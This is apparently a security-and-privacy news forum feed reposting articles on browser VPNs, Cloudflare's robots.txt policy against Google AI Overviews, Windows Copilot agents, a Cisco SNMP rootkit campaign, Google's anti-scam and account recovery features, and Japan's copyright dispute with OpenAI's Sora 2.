					Edge Secure Network is, of course, only available in Edge, but it's free for anyone who signs in to the browser using a personal Microsoft account. <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/software-apps/browsing/microsoft-edge-vpn-gets-massive-increase-for-monthly-data" href="https://www.windowscentral.com/software-apps/browsing/microsoft-edge-vpn-gets-massive-increase-for-monthly-data" rel="external nofollow" target="_blank">Users get 5GB of free data per month</a>, up from the 1GB data allowance at launch.
				</p>

				<p>
					 
				</p>

				<p>
					Edge Secure Network has some intelligent settings that can help manage data usage. The default "Optimized" setting automatically enables the VPN if you're connected to public Wi-Fi (or other unsecured networks) or when you visit a site without proper certification.
				</p>

				<p>
					 
				</p>

				<p>
					You can also set Edge Secure Network to run a VPN on all sites, or you can set a custom list of sites on which you'd like the VPN to work. Like Firefox VPN, Edge only collects some diagnostic and support data, which is deleted every 25 hours.
				</p>

				<p>
					 
				</p>

				<p>
					Overall, Edge Secure Network is essentially the same as Firefox VPN, albeit with some data restrictions. It will be interesting to see if Mozilla places a similar data limit on Firefox VPN once it arrives for all users.
				</p>

				<p>
					 
				</p>

				<p>
					<a href="https://www.windowscentral.com/software-apps/firefox-vpn-testing-edge-secure-network" rel="external nofollow">Source</a>
				</p>

				<hr class="ipsHr">
				<p>
					<span style="font-size:12px;"><em>Posted Friday 17 October 2025 at 4:12 am AEST (my time).</em></span>
				</p>

			</div>
		</div>
	</div>
</div>
]]></description><guid isPermaLink="false">31924</guid><pubDate>Thu, 16 Oct 2025 18:16:47 +0000</pubDate></item><item><title>Inside the web infrastructure revolt over Google&#x2019;s AI Overviews</title><link>https://nsaneforums.com/news/security-privacy-news/inside-the-web-infrastructure-revolt-over-google%E2%80%99s-ai-overviews-r31916/</link><description><![CDATA[<h3>
	Cloudflare CEO Matthew Prince is making sweeping changes to force Google's hand.
</h3>

<p>
	It could be a consequential act of quiet regulation. Cloudflare, a web infrastructure company, has updated millions of websites' robots.txt files in an effort to force Google to change how it crawls them to fuel its AI products and initiatives.
</p>

<p>
	 
</p>

<p>
	We spoke with Cloudflare CEO Matthew Prince about what exactly is going on here, why it matters, and what the web might soon look like. But to get into that, we need to cover a little background first.
</p>

<p>
	 
</p>

<p>
	The new change, which Cloudflare calls its <a href="https://blog.cloudflare.com/content-signals-policy/" rel="external nofollow">Content Signals Policy</a>, came after publishers and other companies that depend on web traffic cried foul over Google's AI Overviews and similar AI answer engines, saying these products sharply cut their path to revenue because they don't send traffic back to the source of the information.
</p>

<p>
	 
</p>

<p>
	There have been lawsuits, efforts to kick-start new marketplaces to ensure compensation, and more—but few companies have the kind of leverage Cloudflare does. Its products and services back something close to 20 percent of the web, and thus a significant slice of the websites that show up on search results pages or that fuel large language models.
</p>

<p>
	 
</p>

<p>
	"Almost every reasonable AI company that's out there is saying, listen, if it's a fair playing field, then we're happy to pay for content," Prince said. "The problem is that all of them are terrified of Google because if Google gets content for free but they all have to pay for it, they are always going to be at an inherent disadvantage."
</p>

<p>
	 
</p>

<p>
	This is happening because Google is using its dominant position in search to ensure that web publishers allow their content to be used in ways they might not otherwise want.
</p>

<h2>
	The changing norms of the web
</h2>

<p>
	Since 2023, Google has offered a way for website administrators to <a href="https://winbuzzer.com/2025/05/06/google-admits-it-sidesteps-publisher-opt-out-controls-for-ai-training-xcxwbn/" rel="external nofollow">opt their content out</a> of use for training Google's large language models, such as Gemini.
</p>

<p>
	 
</p>

<p>
	However, allowing pages to be indexed by Google's search crawlers and shown in results requires accepting that they'll also be used to generate AI Overviews at the top of results pages through a process called retrieval-augmented generation (RAG).
</p>

<p>
	 
</p>

<p>
	That's not so for many other crawlers, making Google an outlier among major players.
</p>

<p>
	 
</p>

<p>
	This is a sore point for a wide range of website administrators, from news websites that publish journalism to investment banks that produce research reports.
</p>

<p>
	 
</p>

<p>
	A July study from the Pew Research Center analyzed data from 900 adults in the US and found that AI Overviews <a href="https://www.pewresearch.org/short-reads/2025/07/22/google-users-are-less-likely-to-click-on-links-when-an-ai-summary-appears-in-the-results/" rel="external nofollow">cut referrals nearly in half</a>. Specifically, users clicked a link on a page with AI Overviews at the top just 8 percent of the time, compared to 15 percent for search engine results pages without those summaries.
</p>

<p>
	 
</p>

<p>
	And a report in The Wall Street Journal cited a wide range of sources—including internal traffic metrics from numerous major publications like The New York Times and Business Insider—to <a href="https://www.wsj.com/tech/ai/google-ai-news-publishers-7e687141?mod=article_inline" rel="external nofollow">describe industry-wide plummets</a> in website traffic that those publishers said were tied to AI summaries, leading to layoffs and strategic shifts.
</p>

<p>
	 
</p>

<p>
	In August, Google's head of search, Liz Reid, disputed the validity and applicability of studies and publisher reports of reduced link clicks in search. "Overall, total organic click volume from Google Search to websites has been relatively stable year-over-year," she <a href="https://blog.google/products/search/ai-search-driving-more-queries-higher-quality-clicks/" rel="external nofollow">wrote</a>, going on to say that reports of big declines were "often based on flawed methodologies, isolated examples, or traffic changes that occurred prior to the rollout of AI features in Search."
</p>

<p>
	 
</p>

<p>
	Publishers aren't convinced. Penske Media Corporation, which owns brands like The Hollywood Reporter and Rolling Stone, <a href="https://www.theverge.com/ai-artificial-intelligence/777788/rolling-stone-penske-media-sue-google-ai-overviews" rel="external nofollow">sued Google over AI Overviews</a> in September. The suit claims that affiliate link revenue has dropped by more than a third in the past year, due in large part to Google's overviews—a threatening shortfall in a business that already has difficult margins.
</p>

<p>
	 
</p>

<p>
	Penske's suit specifically noted that because Google bundles traditional search engine indexing and RAG use together, the company has no choice but to allow Google to keep summarizing its articles, as cutting off Google search referrals entirely would be financially fatal.
</p>

<p>
	 
</p>

<p>
	Since the earliest days of digital publishing, referrals have in one way or another acted as the backbone of the web's economy. Content could be made available freely to both human readers and crawlers, and norms were applied across the web to allow information to be tracked back to its source and give that source an opportunity to monetize its content to sustain itself.
</p>

<p>
	 
</p>

<p>
	Today, there's a panic that the old system isn't working anymore as content summaries via RAG have become more common, and along with other players, Cloudflare is trying to update those norms to reflect the current reality.
</p>

<h2>
	A mass-scale update to robots.txt
</h2>

<p>
	Announced on September 24, Cloudflare's Content Signals Policy is an effort to use the company's influential market position to change how content is used by web crawlers. It involves updating millions of websites' robots.txt files.
</p>

<p>
	 
</p>

<p>
	Starting in 1994, websites began placing a file called "robots.txt" at the domain root to indicate to automated web crawlers which parts of the domain should be crawled and indexed and which should be ignored. The standard became near-universal over the years; honoring it has been a key part of how Google's web crawlers operate.
</p>

<p>
	 
</p>

<p>
	Historically, robots.txt simply included a list of paths on the domain that were flagged as either "allow" or "disallow." It was technically not enforceable, but it became an effective honor system because it had advantages for the owners of both the website and the crawler: Website owners could dictate access for various business reasons, and it helped crawlers avoid working through data that wouldn't be relevant.
</p>

<p>
	 
</p>

<p>
	But robots.txt only tells crawlers whether they can access something at all; it doesn't tell them what they can use it for. For example, Google supports disallowing the agent "Google-Extended" as a path to blocking crawlers that are looking for content with which to train future versions of its Gemini large language model—though introducing that rule doesn't do anything about the training Google did before it rolled out Google-Extended in 2023, and it doesn't stop crawling for RAG and AI Overviews.
</p>

<p>
	 
</p>

<p>
	The Content Signals Policy initiative is a newly proposed format for robots.txt that is intended to tell crawlers what they may use content for, not just whether they may access it. It allows website operators to opt in or out of consenting to the following use cases, as worded in the policy:
</p>

<blockquote class="QuoteNewsStyle">
	<ul>
		<li>
			search: Building a search index and providing search results (e.g., returning hyperlinks and short excerpts from your website's contents). Search does not include providing AI-generated search summaries.
		</li>
		<li>
			ai-input: Inputting content into one or more AI models (e.g., retrieval augmented generation, grounding, or other real-time taking of content for generative AI search answers).
		</li>
		<li>
			ai-train: Training or fine-tuning AI models.
		</li>
	</ul>
</blockquote>

<p>
	Cloudflare has given all of its customers quick paths for setting those values on a case-by-case basis. Further, it has automatically updated robots.txt on the 3.8 million domains that already use Cloudflare's managed robots.txt feature, with search defaulting to yes, ai-train to no, and ai-input blank, indicating a neutral position.
</p>

<h2>
	The threat of potential litigation
</h2>

<p>
	In making this look a bit like a terms of service agreement, Cloudflare's goal is explicitly to put legal pressure on Google to change its policy of bundling traditional search crawlers and AI Overviews.
</p>

<p>
	 
</p>

<p>
	"Make no mistake, the legal team at Google is looking at this saying, 'Huh, that's now something that we have to actively choose to ignore across a significant portion of the web,'" Prince told me.
</p>

<figure class="ars-wp-img-shortcode id-2122744 align-none">
	<div>
		<img alt="robots-license-1024x611.png" class="none large" decoding="async" height="611" loading="lazy" sizes="auto, (max-width: 1024px) 100vw, 1024px" srcset="https://cdn.arstechnica.net/wp-content/uploads/2025/10/robots-license-1024x611.png 1024w, https://cdn.arstechnica.net/wp-content/uploads/2025/10/robots-license-640x382.png 640w, https://cdn.arstechnica.net/wp-content/uploads/2025/10/robots-license-768x458.png 768w, https://cdn.arstechnica.net/wp-content/uploads/2025/10/robots-license-980x584.png 980w, https://cdn.arstechnica.net/wp-content/uploads/2025/10/robots-license-1440x859.png 1440w, https://cdn.arstechnica.net/wp-content/uploads/2025/10/robots-license.png 1516w" width="1024" src="https://cdn.arstechnica.net/wp-content/uploads/2025/10/robots-license-1024x611.png">
	</div>

	<figcaption>
		<div class="caption font-impact dusk:text-gray-300 mb-4 mt-2 inline-flex flex-row items-stretch gap-1 text-base leading-tight text-gray-400 dark:text-gray-300">
			<div class="caption-content">
				<em>Cloudflare specifically made this look like a license agreement. <span class="caption-credit mt-2 text-xs"><em> </em></span></em>
			</div>

			<div class="caption-content">
				<em><span class="caption-credit mt-2 text-xs"><em>Credit: <a class="caption-credit-link text-gray-400 no-underline hover:text-gray-500" href="https://blog.cloudflare.com/content-signals-policy/" target="_blank" rel="external nofollow"> Cloudflare </a> </em></span> </em>
			</div>
		</div>
	</figcaption>
</figure>

<p>
	He further characterized this as an effort to get a company that he says has historically been "largely a good actor" and a "patron of the web" to go back to doing the right thing.
</p>

<p>
	 
</p>

<p>
	"Inside of Google, there is a fight where there are people who are saying we should change how we're doing this," he explained. "And there are other people saying, no, that gives up our inherent advantage, we have a God-given right to all the content on the Internet."
</p>

<p>
	 
</p>

<p>
	Amid that debate, lawyers have sway at Google, so Cloudflare tried to design tools "that made it very clear that if they were going to follow any of these sites, there was a clear license which was in place for them. And that will create risk for them if they don't follow it," Prince said.
</p>

<h2>
	The next web paradigm
</h2>

<p>
	It takes a company with Cloudflare's scale to do something like this with any hope that it will have an impact. If just a few websites made this change, Google would have an easier time ignoring it, or worse yet, it could simply stop crawling them to avoid the problem. Since Cloudflare is entangled with millions of websites, Google couldn't do that without materially impacting the quality of the search experience.
</p>

<p>
	 
</p>

<p>
	Cloudflare has a vested interest in the general health of the web, but there are other strategic considerations at play, too. The company has been working on tools to assist with RAG on customers' websites in <a href="https://www.techradar.com/pro/microsoft-guns-for-google-with-new-search-cloudflare-partnership-that-aims-to-make-websites-more-ai-agent-friendly" rel="external nofollow">partnership</a> with Microsoft-owned Google competitor Bing and has <a href="https://arstechnica.com/tech-policy/2025/07/pay-up-or-stop-scraping-cloudflare-program-charges-bots-for-each-crawl/" rel="external nofollow">experimented with a marketplace</a> that provides a way for websites to charge crawlers for scraping the sites for AI, though what final form that might take is still unclear.
</p>

<p>
	 
</p>

<p>
	I asked Prince directly if this comes from a place of conviction. "There are very few times that opportunities come along where you get to help think through what a future better business model of an organization or institution as large as the Internet and as important as the Internet is," he said. "As we do that, I think that we should all be thinking about what have we learned that was good about the Internet in the past and what have we learned that was bad about the Internet in the past."
</p>

<p>
	 
</p>

<p>
	It's important to acknowledge that we don't yet know what the future business model of the web will look like. Cloudflare itself has ideas. Others have proposed new standards, marketplaces, and strategies, too. There will be winners and losers, and those won't always be the same winners and losers we saw in the previous paradigm.
</p>

<p>
	 
</p>

<p>
	What most people seem to agree on, whatever their individual incentives, is that Google shouldn't get to come out on top in a future answer-engine-driven web paradigm just because it previously established dominance in the search-engine-driven one.
</p>

<p>
	 
</p>

<p>
	For this new standard for robots.txt, success looks like Google allowing content to be available in search but not in AI Overviews. Whatever the long-term vision, and whether it happens because of Cloudflare's pressure with the Content Signals Policy or some other driving force, most agree that it would be a good start.
</p>

<p>
	 
</p>

<p>
	<a href="https://arstechnica.com/ai/2025/10/inside-the-web-infrastructure-revolt-over-googles-ai-overviews/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post. Feedback welcome.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Friday 17 October 2025 at 3:59 am AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of September): 4,533</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a></span></strong>
</p>
]]></description><guid isPermaLink="false">31916</guid><pubDate>Thu, 16 Oct 2025 18:00:02 +0000</pubDate></item><item><title>Microsoft debuts its next big high-stakes AI feature in Windows - can you trust it?</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-debuts-its-next-big-high-stakes-ai-feature-in-windows-can-you-trust-it-r31912/</link><description><![CDATA[<p>
	<span style="font-size:16px;"><strong>The last time Microsoft rolled out a major AI feature with this level of access to your personal data, it ... didn't go well. </strong></span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:18px;"><strong>ZDNET's key takeaways</strong></span>
</p>

<p>
	 
</p>

<ul>
	<li>
		  Windows 11 is adding agents that can take actions on your behalf.
	</li>
	<li>
		  Copilot agents represent potential security and privacy risks.
	</li>
	<li>
		  Expect testing and more security controls before the feature goes public.
	</li>
</ul>

<p>
	 
</p>

<p>
	Every computer security decision ultimately comes down to a question of trust. Should you install this program you're about to download from an unfamiliar website? Are you certain that your email messages are going directly to their recipient without being intercepted? Is it safe to provide that merchant with your credit card details?
</p>

<p>
	 
</p>

<p>
	Soon, owners of PCs running Windows 11 will have another question to add to that list: Should you trust this Copilot agent to poke around in your files and interact with apps on your behalf?
</p>

<p>
	 
</p>

<p>
	Here's how Microsoft describes the Copilot Actions feature, which is rolling out for testing by members of the Windows Insider Program:
</p>

<p>
	 
</p>

<p style="margin-left:40px;">
	<strong>Copilot Actions is an AI agent that completes tasks for you by interacting with your apps and files, using vision and advanced reasoning to click, type, and scroll like a human would.</strong>
</p>

<p style="margin-left:40px;">
	 
</p>

<p style="margin-left:40px;">
	<strong>This transforms agents from passive assistants into active digital collaborators that can carry out complex tasks for you to enhance efficiency and productivity -- like updating documents, organizing files, booking tickets, or sending emails. After you've granted the agent access, when integrated with Windows, the agent can take advantage of what you already have on your PC, like your apps and data, to complete tasks for you.</strong>
</p>

<p>
	 
</p>

<p>
	These are pretty big trust decisions. Allowing an agent to interact with your personal files requires a leap of faith. So does the idea of letting an agent act on your behalf in apps -- where, presumably, you are signed in using some sort of secure credentials.
</p>

<p>
	<br />
	<span style="font-size:22px;"><strong>Learning from the past</strong></span>
</p>

<p>
	 
</p>

<p>
	The last time Microsoft rolled out a major AI feature with this level of access to your personal data, it ... didn't go well. The Windows Recall feature was slammed by security researchers, delayed for months, and finally relaunched with major privacy and security changes. Ultimately, it was nearly a year before the feature made it to public builds.
</p>

<p>
	 
</p>

<p>
	This time around, Microsoft is taking no such chances. In a pair of on-the-record briefings ahead of the public debut of the Copilot Actions feature, executives at the company went to great pains to emphasize its commitment to privacy and security controls.
</p>

<p>
	 
</p>

<p>
	For starters, the feature is rolling out as a preview, in "experimental mode," exclusively for customers who've opted into the Windows Insider Program for pre-release builds of Windows.
</p>

<p>
	 
</p>

<p>
	The feature will be disabled by default and will only be enabled when the user flips the "Experimental agentic features" switch in Windows Settings &gt; System &gt; AI components &gt; Agent tools.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.zdnet.com/article/microsoft-debuts-its-next-big-high-stakes-ai-feature-in-windows-can-you-trust-it/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">31912</guid><pubDate>Thu, 16 Oct 2025 16:19:22 +0000</pubDate></item><item><title>Hackers Deploy Linux Rootkits via Cisco SNMP Flaw in 'Zero Disco' Attacks</title><link>https://nsaneforums.com/news/security-privacy-news/hackers-deploy-linux-rootkits-via-cisco-snmp-flaw-in-zero-disco-attacks-r31911/</link><description><![CDATA[<p>
	Cybersecurity researchers have disclosed details of a new campaign that exploited a recently disclosed security flaw impacting Cisco IOS Software and IOS XE Software to deploy Linux rootkits on older, unprotected systems.
</p>

<p>
	 
</p>

<p>
	The activity, codenamed Operation Zero Disco by Trend Micro, involves the weaponization of CVE-2025-20352 (CVSS score: 7.7), a stack overflow vulnerability in the Simple Network Management Protocol (SNMP) subsystem that could allow an authenticated, remote attacker to execute arbitrary code by sending crafted SNMP packets to a susceptible device. The intrusions have not been attributed to any known threat actor or group.
</p>

<p>
	 
</p>

<p>
	The shortcoming was patched by Cisco late last month, but not before it was exploited as a zero-day in real-world attacks.
</p>

<p>
	"The operation primarily impacted Cisco 9400, 9300, and legacy 3750G series devices, with additional attempts to exploit a modified Telnet vulnerability (based on CVE-2017-3881) to enable memory access," researchers Dove Chiu and Lucien Chuang said.
</p>

<p>
	 
</p>

<p>
	The cybersecurity company also noted that the rootkits allowed attackers to achieve remote code execution and gain persistent unauthorized access by setting universal passwords and installing hooks into the Cisco IOS daemon (IOSd) memory space. IOSd is run as a software process within the Linux kernel.
</p>

<p>
	 
</p>

<p>
	Another notable aspect of the attacks is that they singled out victims running older Linux systems that do not have endpoint detection and response solutions enabled, making it possible to deploy the rootkits in order to fly under the radar. In addition, the adversary is said to have used spoofed IPs and Mac email addresses in their intrusions.
</p>

<p>
	 
</p>

<p>
	Besides CVE-2025-20352, the threat actors have also been observed attempting to exploit a Telnet vulnerability that is a modified version of CVE-2017-3881 so as to allow memory read/write at arbitrary addresses. However, the exact nature of the functionality remains unclear.
</p>

<p>
	 
</p>

<p>
	The name "Zero Disco" is a reference to the fact that the implanted rootkit sets a universal password that includes the word "disco" in it -- a one-letter change from "Cisco."
</p>

<p>
	 
</p>

<p>
	"The malware then installs several hooks onto the IOSd, which results in fileless components disappearing after a reboot," the researchers noted. "Newer switch models provide some protection via Address Space Layout Randomization (ASLR), which reduces the success rate of intrusion attempts; however, it should be noted that repeated attempts can still succeed."
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://thehackernews.com/2025/10/hackers-deploy-linux-rootkits-via-cisco.html" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">31911</guid><pubDate>Thu, 16 Oct 2025 13:21:17 +0000</pubDate></item><item><title>Google launches new scam protection features for Android users</title><link>https://nsaneforums.com/news/security-privacy-news/google-launches-new-scam-protection-features-for-android-users-r31905/</link><description><![CDATA[<p>
	As our internet and devices advance each day, <a automate_uuid="f9410325-364c-451d-9ecb-17c358f5462b" href="https://www.neowin.net/news/googles-charitable-arm-pumps-5-million-to-fight-online-scams-in-asia-pacific-region/" rel="external nofollow">scammers and their attacks</a> have become sophisticated too. Modern-day phishing attacks have moved past spelling mistakes or strange-looking documents, exploiting techniques like deepfakes, voice cloning, and social engineering to convince their targets.
</p>

<p>
	 
</p>

<p>
	Google has <a automate_uuid="f1514eb3-7139-4ad2-9045-dad4a250f254" href="https://blog.google/technology/safety-security/how-google-protects-against-scams-2025/" rel="external nofollow">announced</a> new safety features for Google Messages to help users dodge potential scam attacks and spot them before it's too late. For starters, Google Messages now prevents users from visiting links inside messages suspected of being scams.
</p>

<figure class="image image--expandable">
	<img alt="Google Messages Scam Link Detection" class="ipsImage" height="405" width="720" src="https://cdn.neowin.com/news/images/uploaded/2025/10/1760555678_google_messages_scam_link_detection.webp">
</figure>

<p>
	The feature is rolling out to all users globally, giving them the option to mark a message as "not spam" if it's flagged by mistake.
</p>

<p>
	 
</p>

<p>
	Android has a new Key Verifier tool, which is making its way to Google Messages. It's a system service designed to protect users from fraudsters and impersonators. Users can scan a trusted contact's QR code to verify that contact's public key for end-to-end encrypted messages.
</p>

<figure class="image image--expandable">
	<img alt="Google Messages Key Verifier" class="ipsImage" height="405" width="720" src="https://cdn.neowin.com/news/images/uploaded/2025/10/1760555673_google_android_key_verifier.webp">
</figure>

<p>
	In Google Messages, select a contact you want to verify. Tap on their name at the top of the chat screen, then go to Details &gt; Verify keys and follow the steps. Key Verifier is rolling out to all users running Android 10 and later versions.
</p>

<p>
	 
</p>

<p>
	The search giant said that "widespread access to cutting-edge technology is making scams more convincing and nefarious than ever before," adding that about 60% of people globally have experienced some kind of scam in the last year.
</p>

<p>
	 
</p>

<p>
	Users can play Google's educational game <em><a automate_uuid="f7784242-db81-4f3d-aa59-471dd598b4fc" href="https://bescamready.withgoogle.com/intl/en" rel="external nofollow">Be Scam Ready</a></em>, which is based on the inoculation theory, to expose themselves to simulations of real-life scam and fraud situations.
</p>

<p>
	 
</p>

<p>
	Apart from that, Google is also rolling out a couple of recovery features for situations when people get locked out of their account or someone else gains access to it. They can now <a automate_uuid="13ef0249-36b8-4048-b3e5-14995cf35aad" href="https://www.neowin.net/news/google-now-lets-your-friends-help-recover-your-forgotten-account-password/" rel="external nofollow">set up Recovery Contacts</a>, allowing their friends and family members to assist in the account recovery process.
</p>

<p>
	 
</p>

<p>
	If their primary phone gets stolen or broken, people can use their phone number to regain access. A new Android feature called "Sign in with Mobile Number" automatically identifies users' linked accounts after they type in their phone number.
</p>

<figure class="image image--expandable">
	<img alt="Google Android Sign In with phone number" class="ipsImage" height="404" width="720" src="https://cdn.neowin.com/news/images/uploaded/2025/10/1760555668_google_sign_in_with_phone_number.webp">
</figure>

<p>
	The account details are verified after the user enters the lock screen password from their previous device. The feature doesn't require users to know their Google account password; it will gradually roll out to all users worldwide.
</p>

<p>
	 
</p>

<p>
	October is Cybersecurity Awareness Month in the US. Google said it will host in-person scam and fraud workshops at Google Store locations in New York City and Mountain View on October 21 and 28, respectively.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/google-launches-new-scam-protection-features-for-android-users/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Posted Thursday 16 October 2025 at 12:32 pm AEST (my time).</em></span>
</p>

]]></description><guid isPermaLink="false">31905</guid><pubDate>Thu, 16 Oct 2025 02:33:01 +0000</pubDate></item><item><title>"Stop ripping off manga and anime," Japan's government warns OpenAI</title><link>https://nsaneforums.com/news/security-privacy-news/stop-ripping-off-manga-and-anime-japans-government-warns-openai-r31904/</link><description><![CDATA[<p>
	About seven months ago, OpenAI <a automate_uuid="2ebd0d73-a64b-4be3-908c-73d4e95b24a5" href="https://www.neowin.net/news/openai-announces-a-major-update-to-ai-image-generation-in-chatgpt/" rel="external nofollow">released</a> its GPT-4o Image Generation model. Integrated directly into ChatGPT, it was OpenAI's best image generator at the time, offering higher quality, better text rendering, and greater precision than older models. But users quickly found that it could create convincing fake receipts (something OpenAI <a automate_uuid="4439aef8-31cd-4aae-a24f-1c41c51abef9" href="https://www.neowin.net/news/openai-defends-usage-of-improved-image-generator-to-create-fake-receipts/" rel="external nofollow">defended</a> by claiming that fake receipts can be "used to teach people about financial literacy").
</p>

<p>
	 
</p>

<p>
	They also discovered its knack for generating images in the distinctive art style of the Japanese animation studio Studio Ghibli, the makers of <em>My Neighbor Totoro</em> and <em>Spirited Away</em>.
</p>

<p>
	 
</p>

<p>
	Obviously, that initial launch drew controversy over copyright concerns. Those concerns were only heightened when OpenAI <a automate_uuid="48bafab4-5249-4de0-bc16-15a96d2a1924" href="https://www.neowin.net/news/openai-unveils-sora-2-along-with-a-new-ios-app-with-ai-generated-video-feed/" rel="external nofollow">released</a> Sora 2 about two weeks ago, on October 1.
</p>

<p>
	 
</p>

<p>
	Sora 2 is capable of creating 20-second-long 1080p videos with sound. And just like with the launch of 4o Image Generation, the internet was flooded with AI creations. This time, users generated videos with characters from prominent franchises such as <em>Pokémon</em> (including Pikachu), <em>Mario</em>, <em>One Piece</em>, and <em>Demon Slayer</em>.
</p>

<p>
	 
</p>

<p>
	This has led Japan's government to step in and call out OpenAI. <a automate_uuid="21ac3eee-5444-4b53-b247-9d58bf5ca608" href="https://www.ign.com/articles/japanese-government-calls-on-sora-2-maker-openai-to-refrain-from-copyright-infringement-says-characters-from-manga-and-anime-are-irreplaceable-treasures-that-japan-boasts-to-the-world" rel="external nofollow">According to IGN</a>, Japan wants the company to stop ripping off its "irreplaceable treasures" like manga and anime. At a press conference last Friday, Minoru Kiuchi, the minister of state for IP and AI strategy, told reporters that the Cabinet Office made a formal online request for OpenAI to refrain from infringing on Japanese IPs.
</p>

<p>
	 
</p>

<p>
	Days before the press conference, Akihisa Shiozaki, the deputy Secretary-General of Japan's ruling party, LDP, <a automate_uuid="ed6bc838-4a6d-4a9f-9217-52fa6ed165ba" href="https://x.com/AkihisaShiozaki/status/1974010358823260391" rel="external nofollow">threatened</a> to invoke Article 16 of the AI Promotion Act if the situation did not improve. He posted that the government should consider using its investigative powers to request an explanation of Sora 2's basic specifications, its filtering measures, and its track record of deletion responses.
</p>

<p>
	 
</p>

<p>
	Shiozaki, in a separate <a automate_uuid="df7c01bd-92be-42a3-8a43-085c4520681b" href="https://x.com/AkihisaShiozaki/status/1974963743189868787" rel="external nofollow">X post (translated),</a> noted that Sora 2 refuses to generate characters owned by U.S. entertainment giants, like Disney:
</p>

<blockquote class="QuoteNewsStyle">
	<p>
		When I tried inputting prompts into Sora2 myself, it generated footage of popular anime characters with a quality indistinguishable from the originals, one after another. Yet, for some reason, characters owned by major U.S. companies, like Mickey Mouse or Superman, didn't appear.
	</p>

	<p>
		 
	</p>

	<p>
		This was clearly an imbalance and potentially a serious issue under copyright law. The efforts and sensibilities of Japanese creators, who have led the world, were at risk of being disregarded.
	</p>
</blockquote>

<p>
	Japan's AI Promotion Act, fully enacted on September 1, 2025, aims to make the country the most "AI-friendly country" in the world. The legislation favors cooperation over harsh penalties, a different path from the EU's stricter regulations.
</p>

<p>
	 
</p>

<p>
	Article 16 of the act grants the government investigative powers, with which it can analyze cases where AI infringes on citizens' rights and then consider countermeasures. These powers do not include fines, but the government can publicly name companies that fail to cooperate.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/stop-ripping-off-manga-and-anime-japans-government-warns-openai/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Posted Thursday 16 October 2025 at 12:31 pm AEST (my time).</em></span>
</p>

]]></description><guid isPermaLink="false">31904</guid><pubDate>Thu, 16 Oct 2025 02:31:57 +0000</pubDate></item><item><title>Google announces Recovery Contacts: ask your friends and family to help you sign in to your account</title><link>https://nsaneforums.com/news/security-privacy-news/google-announces-recovery-contacts-ask-your-friends-and-family-to-help-you-sign-in-to-your-account-r31896/</link><description><![CDATA[<p>
	<img alt="Google-announces-Recovery-Contacts-ask-y" class="ipsImage" data-ratio="75.10" height="404" width="720" src="https://www.ghacks.net/wp-content/uploads/2025/10/Google-announces-Recovery-Contacts-ask-your-friends-and-family-to-help-you-sign-in-to-your-account.jpg">
</p>

<p>
	 
</p>

<p>
	Google has announced a new safety feature for securing user accounts. If you can't sign in to your account, you can now ask friends and family to help you regain access to your account.
</p>

<p>
	 
</p>

<p>
	There are multiple ways to recover access to a <a data-wpel-link="internal" href="https://www.ghacks.net/2025/10/08/google-search-ai-mode-is-available-in-36-new-languages-and-45-regions/" rel="external nofollow" target="_blank">Google</a> account, such as resetting the password, getting a one-time code via SMS, using an alternative email address connected to the account, or using backup codes.
</p>

<p>
	 
</p>

<p>
	Now, you can recover your account in a new way. Let's say someone has forgotten their password, or lost their phone or the device that had their <a data-wpel-link="internal" href="https://www.ghacks.net/2025/04/02/google-is-working-on-a-way-to-let-users-securely-transfer-passkeys-between-devices/" rel="external nofollow" target="_blank">passkey</a> or 2FA authenticator, email client, etc. They can't receive a text to sign in, or use alternate methods immediately. Recovery Contacts is Google's answer to this problem. You simply add a trusted contact, like a close friend or a family member, to your account. It's important to note that the contact will need to have a Google account. That should be fairly obvious, but I think it's better to mention it. Don't confuse this with a recovery email address; that's different, as you own both accounts.
</p>

<p>
	 
</p>

<p>
	Setting up Recovery Contacts is simple: go to your Google account's Security and Sign-in page, at <a data-wpel-link="external" href="https://myaccount.google.com/security" rel="external nofollow" target="_blank">https://myaccount.google.com/security</a>. You should see an option that says "Recovery Contacts". Click on it.
</p>

<p>
	 
</p>

<p>
	Or you can directly go to <a data-wpel-link="external" href="https://g.co/recovery-contacts" rel="external nofollow" target="_blank">g.co/recovery-contacts</a> and click on "Add recovery contact". This opens a pop-up, which is populated with some suggested email addresses belonging to your friends or family.
</p>

<p>
	 
</p>

<p>
	Select the contact, hit continue, and it should ask whether you want to send a recovery contact request. This will send an email to the selected contact, and they will be able to view your name, email address and profile photo. I mean, if you trust someone, they probably already have all these details, right? Hit the send request button, and it will tell you the contact has been sent a request, and that they will need to confirm the request within 7 days. You will also receive an email stating that you have sent a contact request.
</p>

<p>
	 
</p>

<p>
	The Recovery Contacts page will list your open requests. In case you changed your mind, you can cancel the request, or remove a contact from the Recovery Contacts list. This is also where you can choose to accept or decline requests that people have sent you.
</p>

<p>
	 
</p>

<p>
	<a data-wpel-link="external" href="https://blog.google/technology/safety-security/recovery-contacts-verify-google-account/" rel="external nofollow" target="_blank">Google's announcement</a> says that in an emergency, when you're locked out of your account, you can choose to sign in using a Recovery Contact. You will need to send a code to them (that you get from Google), which the contact can use to verify it's a legitimate request, and approve the sign-in attempt. Pretty cool!
</p>

<p>
	 
</p>

<p>
	Here is the official <a data-wpel-link="external" href="https://support.google.com/accounts/answer/16590793" rel="external nofollow" target="_blank">support page for Google Recovery Contacts</a> if you need more details.
</p>

<p>
	 
</p>

<p>
	Recovery Contacts are rolling out to users slowly. I think this is a good feature; it may be useful for everyone, but especially for elderly people, or those who aren't tech-savvy and may need assistance with recovering their account.
